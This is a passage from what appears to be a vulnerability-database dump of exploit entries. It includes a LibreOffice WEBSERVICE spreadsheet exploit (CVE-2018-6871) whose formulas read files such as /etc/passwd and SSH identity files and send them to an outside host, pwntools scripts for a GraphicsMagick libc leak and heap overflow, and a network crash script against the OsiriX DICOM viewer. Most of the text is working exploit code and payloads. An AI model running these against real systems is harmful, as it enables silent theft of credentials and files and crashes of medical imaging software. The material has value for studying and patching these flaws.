\")\" office:value-type=\"float\" office:value=\"1383\" calcext:value-type=\"float\">\r\n <text:p>1383</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F12];1))\" office:value-type=\"float\" office:value=\"1370\" calcext:value-type=\"float\">\r\n <text:p>1370</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C13]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n <table:table-row table:style-name=\"ro1\">\r\n <table:table-cell/>\r\n <table:table-cell office:value-type=\"float\" office:value=\"9\" calcext:value-type=\"float\">\r\n <text:p>9</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=MID([.$F$4]; [.E14]; [.D14]-[.E14])\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"string\">\r\n <text:p></text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=SEARCH(CHAR(10); [.$F$4]; [.F14])\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=[.F14]+LEN(\"IdentityFile \")\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:formula=\"of:=FIND(\"IdentityFile \"; [.$F$4]; SUM([.F13];1))\" office:value-type=\"float\" office:value=\"0\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n <table:table-cell table:number-columns-repeated=\"2\"/>\r\n <table:table-cell table:formula=\"of:=COM.MICROSOFT.WEBSERVICE([.$I$3] & \"/?q=\" & COM.MICROSOFT.WEBSERVICE([.C14]))\" office:value-type=\"string\" office:string-value=\"\" calcext:value-type=\"error\">\r\n <text:p>#VALUE!</text:p>\r\n </table:table-cell>\r\n </table:table-row>\r\n </table:table>\r\n <table:named-expressions/>\r\n </office:spreadsheet>\r\n </office:body>\r\n</office:document>\r\n```\n\n# 0day.today [2018-04-01] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/29774"}, {"lastseen": "2018-04-03T00:19:14", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2017-11-03T00:00:00", "published": "2017-11-03T00:00:00", "href": "https://0day.today/exploit/description/28948", "id": "1337DAY-ID-28948", "type": "zdt", "title": "GraphicsMagick - Memory Disclosure / Heap Overflow Exploit", "sourceData": "'''Vulnerabilities summary\r\nThe following advisory describes two (2) vulnerabilities found in GraphicsMagick.\r\n \r\nGraphicsMagick is \u201cThe swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheeler\u2019s SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.\u201d\r\n \r\nThe vulnerabilities found are:\r\n \r\nMemory Information Disclosure\r\nHeap Overflow\r\nCredit\r\nAn independent security researchers, Jeremy Heng (@nn_amon) and Terry Chia (Ayrx), has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program\r\n \r\nVendor response\r\nThe vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18).\r\n \r\nFor more details: ftp://ftp.graphicsmagick.org/pub/GraphicsMagick/snapshots/ChangeLog.txt\r\n \r\n \r\nVulnerabilities details\r\n \r\nMemory Information Disclosure\r\nGraphicsMagick is vulnerable to a memory information disclosure vulnerability found in DescribeImage function of the magick/describe.c file.\r\n \r\nThe portion of the code containing the vulnerability responsible of printing the IPTC Profile information contained in the image.\r\n \r\nThis vulnerability can be triggered with a specially crafted MIFF file.\r\n \r\nThe code which triggers the vulnerable code path is:\r\n \r\n63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file,\r\n64 const MagickBool verbose)\r\n65 {\r\n...\r\n660 for (i=0; i < profile_length; )\r\n661 {\r\n662 if (profile[i] != 0x1c)\r\n663 {\r\n664 i++;\r\n665 continue;\r\n666 }\r\n667 i++; /* skip file separator */\r\n668 i++; /* skip record number */\r\n...\r\n725 i++;\r\n726 (void) fprintf(file,\" %.1024s:\\n\",tag);\r\n727 length=profile[i++] << 8;\r\n728 length|=profile[i++];\r\n729 text=MagickAllocateMemory(char *,length+1);\r\n730 if (text != (char *) NULL)\r\n731 {\r\n732 char\r\n733 **textlist;\r\n734\r\n735 register unsigned long\r\n736 j;\r\n737\r\n738 (void) strncpy(text,(char *) profile+i,length);\r\n739 text[length]='\\0';\r\n740 textlist=StringToList(text);\r\n741 if (textlist != (char **) NULL)\r\n742 {\r\n743 for (j=0; textlist[j] != (char *) NULL; j++)\r\n744 {\r\n745 (void) fprintf(file,\" %s\\n\",textlist[j]);\r\n...\r\n752 i+=length;\r\n753 }\r\n \r\n \r\nThe value in profile_length variable is set in the following field in the MIFF header: profile-iptc=8\r\n \r\nThere is an out-of-bounds buffer dereference whenever profile[i] is accessed because the increments of i is never checked.\r\n \r\nIf we break on line 738 of describe.c, we can explore what is present on the heap during the strncpy operation.\r\n \r\n \r\ngef\u27a4 x/2xg profile\r\n0x8be210: 0x08000a001c414141 0x00007ffff690fba8\r\n \r\n \r\nThe 8 bytes 0x08000a001c414141 is the profile payload present in the specially crafted MIFF file.\r\n \r\n \r\n41 41 41 - padding\r\n1C - sentinel check in line 662\r\n00 - padding\r\n0A - \"Priority\" tag\r\n08 00 - 8 in big endian, the length\r\n \r\n \r\nIf we examine the value 0x00007ffff690fba8 adjacent to the payload, it becomes apparent that it is an address within the main_arena struct in libc.\r\n \r\n \r\ngef\u27a4 x/xw 0x00007ffff690fba8\r\n0x7ffff690fba8 <main_arena+136>: 0x008cdc40\r\ngef\u27a4 vmmap libc\r\nStart End Offset Perm Path\r\n0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 ---\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r--\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw-\r\n/lib/x86_64-linux-gnu/libc-2.23.so\r\n \r\nNow we can calculate the offset to libc base \u2013 0x3c4b98\r\n \r\nProof of Concept\r\n \r\n$ python miff/readexploit.py\r\n[+] Starting local process \u2018/usr/bin/gm\u2019: pid 20019\r\n[+] Receiving all data: Done (1.27KB)\r\n[*] Process \u2018/usr/bin/gm\u2019 stopped with exit code 0 (pid 20019)\r\n[*] Main Arena Leak: 0x7f72948adb98\r\n[*] libc Base: 0x7f72944e9000\r\n \r\n#!/usr/bin/python\r\n# GraphicsMagick IPTC Profile libc Leak\r\n \r\nfrom pwn import *\r\n \r\ndirectory = \"DIR\"\r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\nprofil' +\r\n 'e-iptc=',\r\n '\\n\\x0c\\n:\\x1a',\r\n '\\n\\x00',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"readexploit.miff\"\r\nlength = 8\r\n \r\n#libc_main_arena_entry_offset = 0x3c4ba8\r\nlibc_main_arena_entry_offset = 0x3c4b98\r\n \r\ndef main():\r\n data = \"AAA\" + \"\\x1c\" + \"\\x00\" + chr(10) + p16(0x8, endian=\"big\")\r\n header = partitions[0] + str(length) + partitions[1]\r\n payload = header + directory + partitions[2] + data + partitions[3]\r\n file(output, \"w\").write(payload)\r\n \r\n p = process(executable=\"gm\", argv=[\"identify\", \"-verbose\", output])\r\n output_leak = p.recvall()\r\n priority_offset = output_leak.index(\"Priority:\") + 12\r\n montage_offset = output_leak.index(\"Montage:\") - 3\r\n leak = output_leak[priority_offset:montage_offset]\r\n if \"0x00000000\" in leak:\r\n log.info(\"Unlucky run. Value corrupted by StringToList\")\r\n exit()\r\n main_arena_leak = u64(leak.ljust(8, \"\\x00\"))\r\n log.info(\"Main Arena Leak: 0x%x\" % main_arena_leak)\r\n libc_base = main_arena_leak - libc_main_arena_entry_offset\r\n log.info(\"libc Base: 0x%x\" % libc_base)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n \r\nHeap Overflow\r\nGraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file.\r\n \r\nThe call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. Instead, the size is calculated by searching for a newline or a null byte in the directory name.\r\n \r\n844 /*\r\n845 Display visual image directory.\r\n846 */\r\n847 image_info=CloneImageInfo((ImageInfo *) NULL);\r\n848 (void) CloneString(&image_info->size,\"64x64\");\r\n849 (void) fprintf(file,\" Directory:\\n\");\r\n850 for (p=image->directory; *p != '\\0'; p++)\r\n851 {\r\n852 q=p;\r\n853 while ((*q != '\\n') && (*q != '\\0'))\r\n854 q++;\r\n855 (void) strncpy(image_info->filename,p,q-p);\r\n856 image_info->filename[q-p]='\\0';\r\n857 p=q;\r\n...\r\n880 }\r\n881 DestroyImageInfo(image_info);\r\n \r\nSince the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name.\r\n \r\n \r\ntype = struct _ImageInfo {\r\n...\r\n FILE *file;\r\n char magick[2053];\r\n char filename[2053];\r\n _CacheInfoPtr_ cache;\r\n void *definitions;\r\n Image *attributes;\r\n unsigned int ping;\r\n PreviewType preview_type;\r\n unsigned int affirm;\r\n _BlobInfoPtr_ blob;\r\n size_t length;\r\n char unique[2053];\r\n char zero[2053];\r\n unsigned long signature;\r\n}\r\n \r\nOne possible way to trigger the vulnerability is to run the identify command on a specially crafted MIFF format file with the verbose flag.\r\n \r\nProof of Concept\r\nThe following proof of concept script will generate a specially crafted MIFF file exploit.miff.\r\n'''\r\n \r\n#!/usr/bin/python\r\n \r\nfrom pwn import *\r\n \r\npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' +\r\n 'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\n\\x0c\\n' +\r\n ':\\x1a',\r\n '\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n')\r\noutput = \"exploit.miff\"\r\n \r\ndef main():\r\n payload = \"A\"*10000\r\n payload = partitions[0] + payload + partitions[1]\r\n file(output, \"w\").write(payload)\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n''' \r\nRunning the GraphicsMagick gm utility with the arguments identify -verbose in GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful.\r\n \r\n \r\ngef\u27a4 r identify -verbose exploit.miff\r\n...\r\ngef\u27a4 br describe.c:856\r\nBreakpoint 1 at 0x4571df: file magick/describe.c, line 856.\r\n...\r\ngef\u27a4 p *image_info\r\n$3 = {\r\n...\r\n compression = UndefinedCompression,\r\n file = 0x0,\r\n magick = '\\000' <repeats 2052 times>,\r\n filename = 'A' <repeats 2053 times>,\r\n cache = 0x4141414141414141,\r\n definitions = 0x4141414141414141,\r\n attributes = 0x4141414141414141,\r\n ping = 0x41414141,\r\n preview_type = 1094795585,\r\n affirm = 0x41414141,\r\n blob = 0x4141414141414141,\r\n length = 0x4141414141414141,\r\n unique = 'A' <repeats 2053 times>,\r\n zero = 'A' <repeats 2053 times>,\r\n signature = 0x4141414141414141\r\n}\r\n'''\n\n# 0day.today [2018-04-02] #", "sourceHref": "https://0day.today/exploit/28948", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-06T09:12:46", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2016-12-16T00:00:00", "published": "2016-12-16T00:00:00", "href": "https://0day.today/exploit/description/26535", "id": "1337DAY-ID-26535", "type": "zdt", "title": "OsiriX DICOM Viewer 8.0.1 - Memory Corruption Exploit", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf8 -*-\r\n#\r\n#\r\n# OsiriX DICOM Viewer 8.0.1 (dulparse.cc) Remote Memory Corruption Vulnerability\r\n#\r\n#\r\n# Vendor: Pixmeo Sarl\r\n# Product web page: http://www.osirix-viewer.com\r\n# Affected version: OsiriX 8.0.1\r\n#\r\n# Summary: With high performance and an intuitive interactive user interface, OsiriX MD is\r\n# the most widely used DICOM viewer in the world. It is the result of more than 10 years of\r\n# research and development in digital imaging. It fully supports the DICOM standard for an\r\n# easy integration in your workflow environment and an open platform for development of\r\n# processing tools. It offers advanced post-processing techniques in 2D and 3D, exclusive\r\n# innovative technique for 3D and 4D navigation and a complete integration with any PACS.\r\n# OsiriX MD supports 64-bit computing and multithreading for the best performances on the\r\n# most modern processors. OsiriX MD is certified for medical use, FDA cleared and CE II labeled.\r\n#\r\n# Summary2: OsiriX is an image processing application for Mac dedicated to DICOM images\r\n# (\".dcm\" / \".DCM\" extension) produced by equipment (MRI, CT, PET, PET-CT, ...).\r\n# Osirix is complementary to existing viewers, in particular to nuclear medicine viewers.\r\n#\r\n# Desc: The vulnerability is caused due to the usage of vulnerable collection of libraries that\r\n# are part of DCMTK Toolkit, specifically the parser for the DICOM Upper Layer Protocol or DUL.\r\n# Stack/Heap Buffer overflow/underflow can be triggered when sending and processing wrong length\r\n# of ACSE data structure received over the network by the DICOM Store-SCP service. An attacker can\r\n# overflow the stack and the heap of the process when sending large array of bytes to the presentation\r\n# context item length segment of the DICOM standard, potentially resulting in remote code execution\r\n# and/or denial of service scenario.\r\n#\r\n# -------------------------------------------------------------------------------------\r\n#\r\n# (lldb) \r\n# Process 65202 stopped\r\n# * thread #20: tid = 0x2c5fcc, 0x0000000108978441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833, name = 'DICOM Store-SCP', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fb5af00fda1)\r\n# frame #0: 0x0000000108978441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833\r\n# OsiriX Lite`parseAssociate:\r\n# -> 0x108978441 <+833>: movzbl (%r10), %eax\r\n# 0x108978445 <+837>: cmpl $0x40, %eax\r\n# 0x108978448 <+840>: movq -0x200(%rbp), %rcx\r\n# 0x10897844f <+847>: je 0x108978513 ; <+1043>\r\n# (lldb) bt\r\n# * thread #19: tid = 0x2f6189, 0x0000000102fe8441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833, name = 'DICOM Store-SCP', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fab8ac000a1)\r\n# * frame #0: 0x0000000102fe8441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833\r\n# frame #1: 0x0000000102fe4363 OsiriX Lite`AE_6_ExamineAssociateRequest(PRIVATE_NETWORKKEY**, PRIVATE_ASSOCIATIONKEY**, int, void*) + 339\r\n# frame #2: 0x0000000102fe14ca OsiriX Lite`PRV_StateMachine(PRIVATE_NETWORKKEY**, PRIVATE_ASSOCIATIONKEY**, int, int, void*) + 314\r\n# frame #3: 0x0000000102fdae9c OsiriX Lite`DUL_ReceiveAssociationRQ(void**, DUL_BLOCKOPTIONS, int, DUL_ASSOCIATESERVICEPARAMETERS*, void**, int) + 4348\r\n# frame #4: 0x0000000102facf1e OsiriX Lite`ASC_receiveAssociation(T_ASC_Network*, T_ASC_Association**, long, void**, unsigned int*, bool, DUL_BLOCKOPTIONS, int) + 462\r\n# frame #5: 0x0000000102c5f28f OsiriX Lite`DcmQueryRetrieveSCP::waitForAssociation(T_ASC_Network*) + 207\r\n# frame #6: 0x0000000102c3f9c7 OsiriX Lite`-[DCMTKQueryRetrieveSCP run] + 4999\r\n# frame #7: 0x0000000102987a37 OsiriX Lite`-[AppController startSTORESCP:] + 519\r\n# frame #8: 0x00007fff975b030d Foundation`__NSThread__start__ + 1243\r\n# frame #9: 0x00007fffab021aab libsystem_pthread.dylib`_pthread_body + 180\r\n# frame #10: 0x00007fffab0219f7 libsystem_pthread.dylib`_pthread_start + 286\r\n# frame #11: 0x00007fffab021221 libsystem_pthread.dylib`thread_start + 13\r\n# (lldb) register read\r\n# General Purpose Registers:\r\n# rax = 0x0000000000000103\r\n# rbx = 0x00000001044c18d8 OsiriX Lite`ECC_Normal\r\n# rcx = 0x00006100002e6200\r\n# rdx = 0x000000000001ad41\r\n# rdi = 0x00000001044c18d8 OsiriX Lite`ECC_Normal\r\n# rsi = 0x00006100002e6200\r\n# rbp = 0x0000700005a4a670\r\n# rsp = 0x0000700005a4a420\r\n# r8 = 0x0000000000000103\r\n# r9 = 0x00000000fb40cfc6\r\n# r10 = 0x00007fab8ac000a1\r\n# r11 = 0x0000000000000041\r\n# r12 = 0x0000700005a4a6b8\r\n# r13 = 0x00000001044c18f0 OsiriX Lite`EC_Normal\r\n# r14 = 0x00000001044c18d8 OsiriX Lite`ECC_Normal\r\n# r15 = 0x0000000000008014\r\n# rip = 0x0000000102fe8441 OsiriX Lite`parseAssociate(unsigned char*, unsigned int, dul_associatepdu*) + 833\r\n# rflags = 0x0000000000010286\r\n# cs = 0x000000000000002b\r\n# fs = 0x0000000000000000\r\n# gs = 0x0000000000000000\r\n#\r\n# -------------------------------------------------------------------------------------\r\n#\r\n# Tested on: OS X 10.12.2 (Sierra)\r\n# OS X 10.12.1 (Sierra)\r\n#\r\n#\r\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n# @zeroscience\r\n#\r\n#\r\n# Advisory ID: ZSL-2016-5382\r\n# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5382.php\r\n#\r\n# https://tools.ietf.org/html/rfc3240\r\n# https://github.com/commontk/DCMTK/commit/1b6bb76\r\n#\r\n# 29.11.2016\r\n#\r\n \r\n \r\nimport sys, socket\r\n \r\nhello = ('\\x01\\x00\\x00\\x00\\x80\\x71\\x00\\x01\\x00\\x00\\x4f\\x52\\x54\\x48'\r\n '\\x41\\x4e\\x43\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4a\\x4f'\r\n '\\x58\\x59\\x50\\x4f\\x58\\x59\\x21\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\n '\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x15\\x31\\x2e\\x32\\x2e\\x38\\x34'\r\n '\\x30\\x2e\\x31\\x30\\x30\\x30\\x38\\x2e\\x33\\x2e\\x31\\x2e\\x31\\x2e'\r\n '\\x31\\x20\\x00\\x80\\x00')\r\n \r\nbye = ('\\x50\\x00\\x00\\x0c\\x51\\x00\\x00\\x04\\x00\\x00\\x07\\xde'\r\n '\\x52\\x00\\x00\\x00')\r\n \r\nbuffer = '\\x41\\x42\\x43\\x44' * 10000\r\n \r\nif len(sys.argv) < 3:\r\n print '\\nUsage: ' +sys.argv[0]+ ' <target> <port>'\r\n print 'Example: ' +sys.argv[0]+ ' 172.19.0.214 11112\\n'\r\n sys.exit(0)\r\n \r\nhost = sys.argv[1]\r\nport = int(sys.argv[2])\r\n \r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nconnect = s.connect((host, port))\r\ns.settimeout(251)\r\ns.send(hello+buffer+bye)\r\ns.close\n\n# 0day.today [2018-02-06] #", "sourceHref": "https://0day.today/exploit/26535", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2018-02-12T13:36:08", "bulletinFamily": "exploit", "description": "LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure. CVE-2018-6871. Remote exploit for Linux platform", "modified": "2018-02-10T00:00:00", "published": "2018-02-10T00:00:00", "id": "EDB-ID:44022", "href": "https://www.exploit-db.com/exploits/44022/", "type": "exploitdb", "title": "LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure", "sourceData": "# Vulnerability description\r\n\r\n[CVE-2018-6871](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6871)\r\n\r\n## First part\r\n\r\nLibreOffice supports COM.MICROSOFT.WEBSERVICE function:\r\n\r\n https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4\r\n\r\nThe function is required to obtain data by URL, usually used as:\r\n\r\n =FILTERXML(WEBSERVICE(\"http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric\");\"number(/weatherdata/forecast/time[2]/temperature/@value)\")\r\n\r\nIn original:\r\n\r\n For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.\r\n\r\nIn LibreOffice, these restrictions are not implemented before 5.4.5/6.0.1.\r\n\r\n## Second part\r\n\r\nBy default the cells are not updated, but if you specify the cell type like ~error, then the cell will be updated when you open document.\r\n\r\n# Exploitation\r\n\r\nTo read file you need just:\r\n\r\n =WEBSERVICE(\"/etc/passwd\")\r\n\r\nThis function can also be used to send a file:\r\n\r\n =WEBSERVICE(\"http://localhost:6000/?q=\" & WEBSERVICE(\"/etc/passwd\"))\r\n\r\nFor successful operation, you need to send the files of the current user, so you need to retrieve current user home path.\r\n\r\n =MID(WEBSERVICE(\"/proc/self/environ\"), FIND(\"USER=\", WEBSERVICE(\"/proc/self/environ\")) + 5, SEARCH(CHAR(0), WEBSERVICE(\"/proc/self/environ\"), FIND(\"USER=\", WEBSERVICE(\"/proc/self/environ\")))-FIND(\"USER=\",\r\n\r\nAlso you can parse other files too, like a ~/.ssh/config or something like that.\r\n\r\nFor other than LibreOffice Calc formats you just need embed calc object to other document (I checked it works).\r\n\r\n# Impact\r\n\r\nIt is easy to send any files with keys, passwords and anything else. 100% success rate, absolutely silent, affect LibreOffice prior to 5.4.5/6.0.1 in all operation systems (GNU/Linux, MS Windows, macOS etc.) and may be embedded in almost all formats supporting by LO.\r\n\r\n# Acknowledgment\r\n\r\nVulnerability was independently found by me (@jollheef) and Ronnie Goodrich && Andrew Krasichkov (according to LibreOffice team notes).\r\n\r\n - - -\r\n\r\n# poc.fods\r\n\r\n```\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n\r\n<office:document xmlns:office=\"urn:oasis:names:tc:opendocument:xmlns:office:1.0\" xmlns:style=\"urn:oasis:names:tc:opendocument:xmlns:style:1.0\" xmlns:text=\"urn:oasis:names:tc:opendocument:xmlns:text:1.0\" xmlns:table=\"urn:oasis:names:tc:opendocument:xmlns:table:1.0\" xmlns:draw=\"urn:oasis:names:tc:opendocument:xmlns:drawing:1.0\" xmlns:fo=\"urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xmlns:dc=\"http://purl.org/dc/elements/1.1/\" xmlns:meta=\"urn:oasis:names:tc:opendocument:xmlns:meta:1.0\" xmlns:number=\"urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0\" xmlns:presentation=\"urn:oasis:names:tc:opendocument:xmlns:presentation:1.0\" xmlns:svg=\"urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0\" xmlns:chart=\"urn:oasis:names:tc:opendocument:xmlns:chart:1.0\" xmlns:dr3d=\"urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0\" xmlns:math=\"http://www.w3.org/1998/Math/MathML\" xmlns:form=\"urn:oasis:names:tc:opendocument:xmlns:form:1.0\" xmlns:script=\"urn:oasis:names:tc:opendocument:xmlns:script:1.0\" xmlns:config=\"urn:oasis:names:tc:opendocument:xmlns:config:1.0\" xmlns:ooo=\"http://openoffice.org/2004/office\" xmlns:ooow=\"http://openoffice.org/2004/writer\" xmlns:oooc=\"http://openoffice.org/2004/calc\" xmlns:dom=\"http://www.w3.org/2001/xml-events\" xmlns:xforms=\"http://www.w3.org/2002/xforms\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:rpt=\"http://openoffice.org/2005/report\" xmlns:of=\"urn:oasis:names:tc:opendocument:xmlns:of:1.2\" xmlns:xhtml=\"http://www.w3.org/1999/xhtml\" xmlns:grddl=\"http://www.w3.org/2003/g/data-view#\" xmlns:tableooo=\"http://openoffice.org/2009/table\" xmlns:drawooo=\"http://openoffice.org/2010/draw\" xmlns:calcext=\"urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0\" xmlns:loext=\"urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0\" xmlns:field=\"urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0\" xmlns:formx=\"urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0\" xmlns:css3t=\"http://www.w3.org/TR/css3-text/\" office:version=\"1.2\" office:mimetype=\"application/vnd.oasis.opendocument.spreadsheet\">\r\n <office:automatic-styles>\r\n <style:style style:name=\"co1\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"73.3pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co2\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"75.66pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co3\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"173.14pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co4\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"64.01pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co5\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"420.94pt\"/>\r\n </style:style>\r\n <style:style style:name=\"co6\" style:family=\"table-column\">\r\n <style:table-column-properties fo:break-before=\"auto\" style:column-width=\"105.19pt\"/>\r\n </style:style>\r\n <style:style style:name=\"ro1\" style:family=\"table-row\">\r\n <style:table-row-properties style:row-height=\"12.81pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"true\"/>\r\n </style:style>\r\n <style:style style:name=\"ro2\" style:family=\"table-row\">\r\n <style:table-row-properties style:row-height=\"126.74pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"false\"/>\r\n </style:style>\r\n <style:style style:name=\"ro3\" style:family=\"table-row\">\r\n <style:table-row-properties style:row-height=\"135.81pt\" fo:break-before=\"auto\" style:use-optimal-row-height=\"true\"/>\r\n </style:style>\r\n <style:style style:name=\"ta1\" style:family=\"table\" style:master-page-name=\"Default\">\r\n <style:table-properties table:display=\"true\" style:writing-mode=\"lr-tb\"/>\r\n </style:style>\r\n <style:style style:name=\"ce1\" style:family=\"table-cell\" style:parent-style-name=\"Default\" style:data-style-name=\"N0\"/>\r\n <style:style style:name=\"ce2\" style:family=\"table-cell\" style:parent-style-name=\"Default\">\r\n <style:text-properties style:use-window-font-color=\"true\"/>\r\n </style:style>\r\n <style:style style:name=\"ce5\" style:family=\"table-cell\" style:parent-style-name=\"Default\">\r\n <style:table-cell-properties fo:background-color=\"#f3715a\"/>\r\n </style:style>\r\n <style:page-layout style:name=\"pm1\">\r\n <style:page-layout-properties style:writing-mode=\"lr-tb\"/>\r\n <style:header-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-bottom=\"7.09pt\"/>\r\n </style:header-style>\r\n <style:footer-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-top=\"7.09pt\"/>\r\n </style:footer-style>\r\n </style:page-layout>\r\n <style:page-layout style:name=\"pm2\">\r\n <style:page-layout-properties style:writing-mode=\"lr-tb\"/>\r\n <style:header-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-bottom=\"7.09pt\" fo:border=\"2.49pt solid #000000\" fo:padding=\"0.51pt\" fo:background-color=\"#c0c0c0\">\r\n <style:background-image/>\r\n </style:header-footer-properties>\r\n </style:header-style>\r\n <style:footer-style>\r\n <style:header-footer-properties fo:min-height=\"21.26pt\" fo:margin-left=\"0pt\" fo:margin-right=\"0pt\" fo:margin-top=\"7.09pt\" fo:border=\"2.49pt solid #000000\" fo:padding=\"0.51pt\" fo:background-color=\"#c0c0c0\">\r\n <style:background-image/>\r\n </style:header-footer-properties>\r\n </style:footer-style>\r\n </style:page-layout>\r\n </office:automatic-styles>\r\n <office:body>\r\n <office:spreadsheet>\r\n <table:calculation-settings table:automatic-find-labels=\"false\" table:use-regular-expressions=\"false\" table:use-wildcards=\"true\"/>\r\n <table:table table:name=\"Sheet1\" table:style-name=\"ta1\">\r\n <table:table-column table:style-name=\"co1\" table:default-cell-style-name=\"Default\"/>\r\n <table:table-column table:style-name=\"co2\" 